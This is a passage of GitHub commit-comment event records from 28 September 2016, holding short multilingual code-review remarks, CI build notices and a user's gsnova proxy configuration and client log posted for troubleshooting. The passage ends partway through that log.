{"id":"4630310337","type":"CommitCommentEvent","actor":{"login":"Nanomani"},"repo":{"name":"pydio/pydio-core"},"payload":{"comment":{"id":19206420,"position":null,"line":null,"path":null,"commit_id":"6066668c2de7b61fa825dd03ae12bad7af570546","created_at":"2016-09-28T12:25:01Z","updated_at":"2016-09-28T12:25:01Z","body":"Done. Thx"}},"created_at":"2016-09-28T12:25:01Z"}
{"id":"4630310779","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19206421,"position":null,"line":null,"path":null,"commit_id":"9fdc33c1024cabdf9c1109e16133883e72853316","created_at":"2016-09-28T12:25:06Z","updated_at":"2016-09-28T12:25:06Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 186](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1253&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-28T12:25:06Z"}
{"id":"4630314458","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206430,"position":68,"line":68,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:25:51Z","updated_at":"2016-09-28T12:25:51Z","body":"Не юзал ни разу, если стрелочки кастомизируются нормально, то да, лучше так.\r\nГоворят только в хроме адекватно работает кастомизация, по поводу того можно ли вообще стрелочки заменить на 2 разных элемента не уверен."}},"created_at":"2016-09-28T12:25:51Z"}
{"id":"4630315120","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19206431,"position":null,"line":null,"path":null,"commit_id":"e34c5e00c52cc7b86a61246d095d4691a957dbce","created_at":"2016-09-28T12:25:58Z","updated_at":"2016-09-28T12:25:58Z","body":"Yeah, i forgot it. :(\r\nCant edit the file.."}},"created_at":"2016-09-28T12:25:58Z"}
{"id":"4630315849","type":"CommitCommentEvent","actor":{"login":"aviafar"},"repo":{"name":"aviafar/Study-Yii-2"},"payload":{"comment":{"id":19206432,"position":null,"line":null,"path":null,"commit_id":"b9e10185cd3b3c247580fd3ebfbb6407d4492c22","created_at":"2016-09-28T12:26:07Z","updated_at":"2016-09-28T12:26:07Z","body":"Это первый мой учебный проект."}},"created_at":"2016-09-28T12:26:07Z"}
{"id":"4630316007","type":"CommitCommentEvent","actor":{"login":"RakeshVenkat"},"repo":{"name":"RakeshVenkat/HelloWorld"},"payload":{"comment":{"id":19206433,"position":null,"line":null,"path":null,"commit_id":"aa19c5d92506fc852e01cf80dfcd75034b9c8ba7","created_at":"2016-09-28T12:26:10Z","updated_at":"2016-09-28T12:26:10Z","body":"to be mereged"}},"created_at":"2016-09-28T12:26:10Z"}
{"id":"4630317618","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19206441,"position":null,"line":null,"path":null,"commit_id":"9fdc33c1024cabdf9c1109e16133883e72853316","created_at":"2016-09-28T12:26:30Z","updated_at":"2016-09-28T12:26:30Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 186](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1253&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:24"}},"created_at":"2016-09-28T12:26:30Z"}
{"id":"4630320350","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19206443,"position":null,"line":null,"path":null,"commit_id":"b5ab13a5ff147c0bb61a3222270691e8acea8b73","created_at":"2016-09-28T12:27:01Z","updated_at":"2016-09-28T12:27:01Z","body":":100:"}},"created_at":"2016-09-28T12:27:01Z"}
{"id":"4630322715","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206445,"position":77,"line":77,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:27:30Z","updated_at":"2016-09-28T12:27:30Z","body":"Она должна делать прямой запрос на сервер?\r\nЯ руководствовался логикой, что если нажатие никуда не ведёт то это не ссылка."}},"created_at":"2016-09-28T12:27:30Z"}
{"id":"4630328558","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/e-commerce"},"payload":{"comment":{"id":19206451,"position":null,"line":null,"path":null,"commit_id":"1a81d4eb50e45524c048c46c730764659bb71314","created_at":"2016-09-28T12:28:46Z","updated_at":"2016-09-28T12:28:46Z","body":"Shouldn't this be in a separate PR?"}},"created_at":"2016-09-28T12:28:46Z"}
{"id":"4630328580","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206452,"position":43,"line":43,"path":"index.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:28:46Z","updated_at":"2016-09-28T12:28:46Z","body":"Так проще сделать блоки высотой в 2 ячейки."}},"created_at":"2016-09-28T12:28:46Z"}
{"id":"4630330892","type":"CommitCommentEvent","actor":{"login":"rdvdijk"},"repo":{"name":"parsingdata/metal"},"payload":{"comment":{"id":19206454,"position":38,"line":269,"path":"core/src/test/java/io/parsingdata/metal/data/selection/ByTokenTest.java","commit_id":"aec046f81e81ec294bccc1488602c75d73df96c9","created_at":"2016-09-28T12:29:13Z","updated_at":"2016-09-28T12:29:13Z","body":"Nitpick: `ALl` > `All`."}},"created_at":"2016-09-28T12:29:13Z"}
{"id":"4630334698","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206459,"position":50,"line":50,"path":"index.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:30:02Z","updated_at":"2016-09-28T12:30:02Z","body":"Как и с иконкой мобильного меню - есть картинка, тогда псевдоэлемент.\r\n"}},"created_at":"2016-09-28T12:30:02Z"}
{"id":"4630338328","type":"CommitCommentEvent","actor":{"login":"yujideveloper"},"repo":{"name":"yujideveloper/health_check"},"payload":{"comment":{"id":19206464,"position":null,"line":null,"path":null,"commit_id":"00ccfce0dcda5d3fd6456cb29fe6c37d97f72a61","created_at":"2016-09-28T12:30:45Z","updated_at":"2016-09-28T12:30:45Z","body":"たしかに"}},"created_at":"2016-09-28T12:30:45Z"}
{"id":"4630340340","type":"CommitCommentEvent","actor":{"login":"phiw13"},"repo":{"name":"philwareham/textpattern-hive-admin-theme"},"payload":{"comment":{"id":19206470,"position":4,"line":3050,"path":"dist/hive/assets/css/textpattern.css","commit_id":"6e0c6dbeb2917ffd7415ca210c130a0150bd80e2","created_at":"2016-09-28T12:31:09Z","updated_at":"2016-09-28T12:31:09Z","body":"Right, it is indeed not needed anymore, at least in recent versions of Safari (9+) and Firefox (45+). Can’t test older versions atm. That wasn’t always the case. Sorry for the distraction."}},"created_at":"2016-09-28T12:31:09Z"}
{"id":"4630341597","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206474,"position":26,"line":26,"path":"sass/basket-promo.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:31:25Z","updated_at":"2016-09-28T12:31:25Z","body":"Не вижу что с ними"}},"created_at":"2016-09-28T12:31:25Z"}
{"id":"4630342547","type":"CommitCommentEvent","actor":{"login":"chrisfranko"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19206477,"position":null,"line":null,"path":null,"commit_id":"15a14a5f497b9b4aff7f97825d9f6e75c5bf46b3","created_at":"2016-09-28T12:31:36Z","updated_at":"2016-09-28T12:31:36Z","body":":O man, thank you!"}},"created_at":"2016-09-28T12:31:36Z"}
{"id":"4630344270","type":"CommitCommentEvent","actor":{"login":"MartinBear"},"repo":{"name":"MartinBear/Pairprogramming"},"payload":{"comment":{"id":19206480,"position":4,"line":111,"path":"Pair-prog-julklapp.js","commit_id":"e737aa6734de4ceccd9208a9ab3d8cb721c62f50","created_at":"2016-09-28T12:31:58Z","updated_at":"2016-09-28T12:31:58Z","body":"Oj vilket bra test!"}},"created_at":"2016-09-28T12:31:58Z"}
{"id":"4630344461","type":"CommitCommentEvent","actor":{"login":"phiw13"},"repo":{"name":"philwareham/textpattern-hive-admin-theme"},"payload":{"comment":{"id":19206481,"position":4,"line":3050,"path":"dist/hive/assets/css/textpattern.css","commit_id":"6e0c6dbeb2917ffd7415ca210c130a0150bd80e2","created_at":"2016-09-28T12:32:00Z","updated_at":"2016-09-28T12:32:00Z","body":"PS - Edge doesn’t support  `position: sticky`. Maybe in a year or so…"}},"created_at":"2016-09-28T12:32:00Z"}
{"id":"4630344698","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":19206482,"position":92,"line":1113,"path":"path_10_9/src/item.cpp","commit_id":"75ea902528dafd65fb5ba3681b8926a3f99eb889","created_at":"2016-09-28T12:32:02Z","updated_at":"2016-09-28T12:32:02Z","body":"Armor is working fully? Ex paladin armor is showing distance +2 not +2%?"}},"created_at":"2016-09-28T12:32:02Z"}
{"id":"4630348956","type":"CommitCommentEvent","actor":{"login":"ianheggie"},"repo":{"name":"yujideveloper/health_check"},"payload":{"comment":{"id":19206493,"position":null,"line":null,"path":null,"commit_id":"d71f3912d49ed0512bbb5bda33397c7aa68f7818","created_at":"2016-09-28T12:32:54Z","updated_at":"2016-09-28T12:32:54Z","body":"Thanks for following up on this - Consider using an env var, just as I did with RUBYGEMS_VERSION to make it explicit that jruby needs the fix, nothing else.\r\n"}},"created_at":"2016-09-28T12:32:54Z"}
{"id":"4630349306","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206494,"position":114,"line":114,"path":"sass/basket.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:32:58Z","updated_at":"2016-09-28T12:32:58Z","body":"Этот блок изначально был таблицей, потом я его переделывал на флексах, поэтому получилось очень много повторений. Его код выглядит отвратительно, согласен."}},"created_at":"2016-09-28T12:32:58Z"}
{"id":"4630354795","type":"CommitCommentEvent","actor":{"login":"gustwald"},"repo":{"name":"gustwald/javascriptskola"},"payload":{"comment":{"id":19206510,"position":null,"line":null,"path":null,"commit_id":"3c32bfdeca1aeb02f436e83edce71304ad4e5264","created_at":"2016-09-28T12:34:06Z","updated_at":"2016-09-28T12:34:06Z","body":"verkar bugga satan"}},"created_at":"2016-09-28T12:34:06Z"}
{"id":"4630356665","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":19206512,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-28T12:34:29Z","updated_at":"2016-09-28T12:34:29Z","body":"Another question about how to config on VPS mode.\r\n\r\nMy json config is as follows:\r\n\r\nServer.json (Deleted TLS  config, no cert&key, only set for encrypt key):\r\n{\r\n\t //this is just a example\r\n\t\"Listen\":\":8668\",\r\n\t//Set this positive value to enable dynamic server port support \r\n\t\"MaxDynamicPort\": 3000,\r\n\t//DynamicPort life time, default 30minutes(1800s)\r\n\t\"DynamicPortLifeCycle\": 1800,\r\n\t//If the server can ONLY export fixed ports, define them here\r\n\t\"CandidateDynamicPort\":[],\r\n\t\"AdminListen\": \"127.0.0.1:60000\",\r\n\t//user name auth\r\n\t\"Auth\":[\"*\", \"gsnova\"],\r\n\t\"Encrypt\":{\"Key\":\"a969495a-8785-423b-9f13-ecd632aaca1d\"},\r\n\t\r\n\t\"Log\": [\"stdout\", \"server.log\"]\r\n}\r\n\r\n\r\nclient.json :\r\n\r\n\r\n{\r\n    //this is just a example\r\n\r\n\t\"Log\": [\"stdout\", \"gsnova.log\"],\r\n\t\"UserAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1\",\r\n\t//encrypt method can choose from aes/salsa20/chacha20/rc4/none/auto\r\n\t//'auto' method would choose fastest encrypt method for current env\r\n\t\"Encrypt\":{\"Method\":\"auto\", \"Key\":\"a969495a-8785-423b-9f13-ecd632aaca1d\"},\r\n   \r\n    //user name auth\r\n    \"Auth\": \"gsnova\",\r\n\r\n    \"LocalDNS\":{\r\n    \t//only listen UDP\r\n    \t\"Listen\": \"127.0.0.1:48100\",\r\n    \t\"TrustedDNS\": [\"208.67.222.222:443\", \"208.67.220.220:443\"],\r\n    \t\"TCPConnect\": false \r\n    },\r\n\r\n    //fake address, only used as udp traffic indicator in VPN mode\r\n    \"UDPGWAddr\": \"20.20.20.20:1111\",\r\n\r\n    //Close idle proxy channels when no active proxy session if 'ChannelKeepAlive' is false\r\n\t\"ChannelKeepAlive\": false,\r\n\r\n    //used to handle admin command from http client    \r\n    \"Admin\":{\r\n    \t//a local http server, do NOT expose this http server to public\r\n    \t//listen on private IP instead of the default config \r\n    \t//eg: \"Listen\": \"192.168.1.1:7788\",\r\n    \t\"Listen\": \":7788\",\r\n    \t\"ConfigDir\":\"./android\"\r\n    },\r\n\r\n\t\"Proxy\":[\r\n\t\t{\r\n\t\t\t\"Local\": \":48100\",\r\n\t\t\t//sniff sni for non 80 port(http) traffic instead of real target address, default is false\r\n\t\t\t\"SNISniff\": true,\r\n\t\t\t\"PAC\":[\r\n\t\t\t\t//// 'Direct/TLSDirect' MUST  proxy channel names confgiured below \r\n\t\t\t\t{\"Protocol\":[\"dns\", \"udp\"],\"Remote\":\"Direct\"},\r\n\t\t\t\t{\"Rule\":[\"IsCNIP\"],\"Remote\":\"Direct\"},\r\n\t\t\t\t{\"Rule\":[\"InHosts\"],\"Remote\":\"TLSDirect\"},\r\n\t\t\t\t{\"Host\":[\"*\"],\"Remote\":\"Direct\"}\r\n\t\t\t]\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Local\": \":48101\",\r\n\t\t\t\"PAC\":[\r\n\t\t\t\t// 'mygae' MUST a proxy channel name confgiured below \r\n\t\t\t\t{\"Remote\":\"mygae\"}\r\n\t\t\t]\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Local\": \":48102\",\r\n\t\t\t\"PAC\":[\r\n\t\t\t\t{\"Remote\":\"heroku\"}\r\n\t\t\t]\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Local\": \":48103\",\r\n\t\t\t\"PAC\":[\r\n\t\t\t\t{\"Remote\":\"linode\"}\r\n\t\t\t]\r\n\t\t}\r\n\t],\r\n\r\n    //there is 4 channel types: direct/gae/paas/vps\r\n\t\"Channel\":[\r\n\t\t{\r\n\t\t\t\"Enable\":true,\r\n\t\t\t\"Type\":\"direct\",\r\n\t\t\t\"Name\":\"Direct\"\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Enable\":true,\r\n\t\t\t\"Type\":\"direct\",\r\n\t\t\t\"Name\":\"TLSDirect\",\r\n\t\t\t\"SNI\":[\"www.google.com.hk\", \"www.google.co.jp\"],\r\n\t\t\t\"ForceTLS\":true\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Enable\":false,\r\n\t\t\t\"Type\":\"gae\",\r\n\t\t\t\"Name\":\"mygae\",\r\n            \"ServerList\":[\"myappid\"],\r\n\t\t\t\"SNI\":[\"www.google.com.hk\", \"www.google.co.jp\"],\r\n\t\t    //Unit: second\r\n\t\t    \"DialTimeout\":5,\r\n\t\t    //Unit: second\r\n\t\t    \"ReadTimeout\":15\r\n\t\t},\r\n\t\t{\r\n\t\t\t\"Enable\":false,\r\n\t\t\t\"Type\":\"paas\",\r\n\t\t\t\"Name\":\"heroku\",\r\n\t\t    \"ServerList\":[\r\n\t\t\t    \"wss://example.paasapp.com\"\r\n\t\t    ],\r\n\t\t     //if u want to use another sni to replace the default\r\n\t\t    \"SNI\": [],\r\n\t\t    //'cn_sni_proxy' is defined in hosts.json if u want use more than one IP for this\r\n\t\t    //\"SNIProxy\" : \"cn_sni_proxy\",\r\n\t\t    \"SNIProxy\" : \"\",\r\n\t\t    //if u are behind a HTTP proxy\r\n\t\t    \"HTTPProxy\":\"\",\r\n\t\t    //Max connections per server\r\n\t\t    \"ConnsPerServer\":3,\r\n\t\t    //Unit: second\r\n\t\t    \"DialTimeout\":5,\r\n\t\t    //Unit: second\r\n\t\t    \"ReadTimeout\":30,\r\n\t\t    //Enable chunk encoding request for faster HTTP push\r\n\t\t    \"HTTPChunkPushEnable\": true,\r\n\t\t    \"ReconnectPeriod\": 30,\r\n\t\t    //ReconnectPeriod rand adjustment, the real reconnect period is random value between [P - adjust, P + adjust] \r\n\t\t    \"RCPRandomAdjustment\" : 5,\r\n\t\t    \"HeartBeatPeriod\": 0 \r\n\t\t},\r\n\t\t{\r\n\t\t    \"Enable\":true,\r\n\t\t    \"Type\":\"vps\",\r\n\t\t\t\"Name\":\"vultr\",\r\n            \"ServerList\":[\"vps ip:8668\"],\r\n\t        //if u are behind a HTTP proxy\r\n\t        \"HTTPProxy\":\"\",\r\n\t\t    \"ConnsPerServer\":3,\r\n\t\t    //Unit: second\r\n\t\t    \"DialTimeout\":5,\r\n\t\t    //Unit: second\r\n\t\t    \"ReadTimeout\":15,\r\n\t\t    //Reconnect after 120s\r\n\t\t    \"ReconnectPeriod\": 120,\r\n\t\t    //ReconnectPeriod rand adjustment, the real reconnect period is random value between [P - adjust, P + adjust] \r\n\t\t    \"RCPRandomAdjustment\" : 60,\r\n\t\t    //Send heartbeat msg to keep alive \r\n\t\t    \"HeartBeatPeriod\": 10\r\n\t\t}\r\n\t]\r\n}\r\n\r\n\r\nBut the gsnova seems cannot work properly from clientside and cannot visit any website by Chrome 48100 proxy.\r\n\r\nWhat's the root cause？ THX！\r\n"}},"created_at":"2016-09-28T12:34:29Z"}
{"id":"4630357140","type":"CommitCommentEvent","actor":{"login":"EllaineGabotero"},"repo":{"name":"carsim101/rfid_project"},"payload":{"comment":{"id":19206514,"position":null,"line":null,"path":null,"commit_id":"156791fb39ee841f0c3731793b52e6a09716ad59","created_at":"2016-09-28T12:34:35Z","updated_at":"2016-09-28T12:34:35Z","body":"taysa hahahhaha"}},"created_at":"2016-09-28T12:34:35Z"}
{"id":"4630357261","type":"CommitCommentEvent","actor":{"login":"YAOrangeTime16"},"repo":{"name":"MartinBear/Pairprogramming"},"payload":{"comment":{"id":19206515,"position":4,"line":111,"path":"Pair-prog-julklapp.js","commit_id":"e737aa6734de4ceccd9208a9ab3d8cb721c62f50","created_at":"2016-09-28T12:34:37Z","updated_at":"2016-09-28T12:34:37Z","body":"okej då måste jag kolla på den en gång till. @MartinBear "}},"created_at":"2016-09-28T12:34:37Z"}
{"id":"4630358125","type":"CommitCommentEvent","actor":{"login":"nrpatten"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19206518,"position":null,"line":null,"path":null,"commit_id":"15a14a5f497b9b4aff7f97825d9f6e75c5bf46b3","created_at":"2016-09-28T12:34:48Z","updated_at":"2016-09-28T12:34:48Z","body":"Nice work 🍺 🍺 "}},"created_at":"2016-09-28T12:34:48Z"}
{"id":"4630362523","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19206534,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T12:35:42Z","updated_at":"2016-09-28T12:35:42Z","body":"@nyalldawson , I'm testing this:\r\n```\r\ntry:\r\n    QGIS_SERVER_WFST_DEFAULT_PORT = os.environ['QGIS_SERVER_WFST_DEFAULT_PORT']\r\nexcept:\r\n    import socket\r\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    s.bind((\"\",0))\r\n    QGIS_SERVER_WFST_DEFAULT_PORT = s.getsockname()[1]\r\n    s.close()\r\n```\r\n\r\nso far, so good.\r\n"}},"created_at":"2016-09-28T12:35:42Z"}
{"id":"4630365093","type":"CommitCommentEvent","actor":{"login":"Lynn-T"},"repo":{"name":"Lynn-T/shadowsocks-windows"},"payload":{"comment":{"id":19206538,"position":null,"line":null,"path":null,"commit_id":"4acae9de9ba7f2a12292f22cf7943aabe3106de0","created_at":"2016-09-28T12:36:11Z","updated_at":"2016-09-28T12:36:11Z","body":"update from origin"}},"created_at":"2016-09-28T12:36:11Z"}
{"id":"4630368183","type":"CommitCommentEvent","actor":{"login":"Oceanspeed"},"repo":{"name":"cucumber-tony/cucumber-frontend"},"payload":{"comment":{"id":19206545,"position":null,"line":null,"path":null,"commit_id":"5e3e285d41cf3fcf82955acc6c1a3626a4cc5eb0","created_at":"2016-09-28T12:36:49Z","updated_at":"2016-09-28T12:36:49Z","body":"Still getting the same issue.\r\n\r\n> Click Location, select the box showing as offline at the bottom.\r\n> Reboot and resynch are greyed out.\r\n\r\n"}},"created_at":"2016-09-28T12:36:49Z"}
{"id":"4630368297","type":"CommitCommentEvent","actor":{"login":"robertlemke"},"repo":{"name":"neos/neos-development-collection"},"payload":{"comment":{"id":19206546,"position":null,"line":null,"path":null,"commit_id":"7a58ffb814bfe314072610de63ef67c81c028a67","created_at":"2016-09-28T12:36:51Z","updated_at":"2016-09-28T12:36:51Z","body":"😱 scary! Thanks for the fix!"}},"created_at":"2016-09-28T12:36:51Z"}
{"id":"4630368709","type":"CommitCommentEvent","actor":{"login":"kaxa1988"},"repo":{"name":"RestComm/jss7"},"payload":{"comment":{"id":19206549,"position":9,"line":9,"path":"map/map-api/src/main/java/org/mobicents/protocols/ss7/map/api/service/sms/SMDeliveryNotIntended.java","commit_id":"1cedc2fc5798e7238452cfe1736d77ae539ad254","created_at":"2016-09-28T12:36:56Z","updated_at":"2016-09-28T12:36:56Z","body":"dhdfjhfg"}},"created_at":"2016-09-28T12:36:56Z"}
{"id":"4630369472","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/tensorflow"},"payload":{"comment":{"id":19206552,"position":null,"line":null,"path":null,"commit_id":"3fe79127a29ae495df9a14aec6af6aebfa77204b","created_at":"2016-09-28T12:37:06Z","updated_at":"2016-09-28T12:37:06Z","body":"Actually, GitHub auto-revoked it as soon as a made the repo public!"}},"created_at":"2016-09-28T12:37:06Z"}
{"id":"4630369647","type":"CommitCommentEvent","actor":{"login":"reksasuhud97"},"repo":{"name":"BesutKode/BesutKode.github.io"},"payload":{"comment":{"id":19206554,"position":null,"line":null,"path":null,"commit_id":"8d75f72fa7306fb9fd99de5d027e3110e14fad58","created_at":"2016-09-28T12:37:08Z","updated_at":"2016-09-28T12:37:08Z","body":"sudah pull request, tp blm di merge kenapa ya?"}},"created_at":"2016-09-28T12:37:08Z"}
{"id":"4630370066","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206556,"position":null,"line":null,"path":null,"commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T12:37:14Z","updated_at":"2016-09-28T12:37:14Z","body":"Я обращал внимание только на брейкпоинт 480, поэтом всё что в промежутке 1024-480 выглядит странно.По идее надо доделывать"}},"created_at":"2016-09-28T12:37:14Z"}
{"id":"4630372985","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"mofl-aspit/PersonPolymorph.Exercise"},"payload":{"comment":{"id":19206563,"position":9,"line":9,"path":"UserLayer/Employee.cs","commit_id":"e6e3ba1fbd584759fe7b075c9a61707c2886ac65","created_at":"2016-09-28T12:37:52Z","updated_at":"2016-09-28T12:37:52Z","body":"Access modifier?"}},"created_at":"2016-09-28T12:37:52Z"}
{"id":"4630374696","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19206565,"position":25,"line":36,"path":"src/utils/string.h","commit_id":"dce8a4629f811f850344acf5c322023633719761","created_at":"2016-09-28T12:38:13Z","updated_at":"2016-09-28T12:38:13Z","body":"I think it is nicer to do it this way:\r\n\r\n```\r\nint trailing_zeros = 1;\r\nwhile (trailing_zeros < 4 && buffer[n_chars - trailing_zeros] == '0')\r\n{\r\n    trailing_zeros++;\r\n}\r\n```\r\n\r\nIt has the same effect but is slightly simpler to read."}},"created_at":"2016-09-28T12:38:13Z"}
{"id":"4630378611","type":"CommitCommentEvent","actor":{"login":"Coopevic"},"repo":{"name":"Coopevic/Turnos-Web"},"payload":{"comment":{"id":19206572,"position":5,"line":26,"path":"index.html","commit_id":"e1fa6859b771a224d746306dd69c61ccdfc693c8","created_at":"2016-09-28T12:39:02Z","updated_at":"2016-09-28T12:39:02Z","body":"Cambie la palabra COOPEVIC por COOPEVIC Ltda."}},"created_at":"2016-09-28T12:39:02Z"}
{"id":"4630378890","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":19206573,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-28T12:39:06Z","updated_at":"2016-09-28T12:39:06Z","body":"And below is log from client side\r\n\r\n2016/09/28 20:35:52 Proxy channel(DIRECT):Direct init success\r\n2016/09/28 20:35:52 Proxy channel(DIRECT):TLSDirect init success\r\n2016/09/28 20:35:52 Channel[0] connect tcp://vps ip:8668 success.\r\n2016/09/28 20:35:52 Server:tcp://vps ip:8668 authed success.\r\n2016/09/28 20:35:52 Proxy channel(VPS):vultr init success\r\nopen gsnova.log: permission denied\r\n2016/09/28 20:35:52 proxy.go:114: Starting GSnova r4.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:35:52 local_server.go:316: Listen on address :48100\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:35:52 local_server.go:316: Listen on address :48101\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:35:52 local_server.go:316: Listen on address :48102\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:35:52 local_server.go:316: Listen on address :48103\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:36:07 channel.go:330: Failed to read channel for reason:read tcp 192.168.1.102:53460->vps ip:8668: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:3 connect tcp:10.10.10.10:443 for 10.10.10.10 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:4 connect tcp:11.11.11.11:443 for 11.11.11.11 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:5 connect tcp:10.10.10.10:443 for 10.10.10.10 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:1 connect tcp:11.11.11.11:443 for 11.11.11.11 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:6 connect tcp:10.10.10.10:443 for 10.10.10.10 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:2 connect tcp:11.11.11.11:443 for 11.11.11.11 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 direct.go:171: Session:7 connect tcp:10.10.10.10:443 for 10.10.10.10 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 channel.go:270: Channel[2] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 channel.go:270: Channel[0] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:06 channel.go:270: Channel[1] connect tcp://vps ip:8668 success.\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:07 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:07 direct.go:171: Session:8 connect tcp:11.11.11.11:443 for 11.11.11.11 *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:08 config.go:129: ip: is CNIP:false\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:08 direct.go:171: Session:9 connect tcp:google.com:80 for google.com *event.HTTPRequestEvent\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 10.10.10.10:443 for 10.10.10.10 with error:dial tcp 10.10.10.10:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 11.11.11.11:443 for 11.11.11.11 with error:dial tcp 11.11.11.11:443: i/o timeout\r\nNo log file inited for gsnova.log \r\n2016/09/28 20:37:11 direct.go:174: Failed to connect 10.10.10.10:443 for 10.10.10.10 with error:dial tcp 10.10.10.10:443: i/o timeout\r\nNo log file inited for gsnova.log 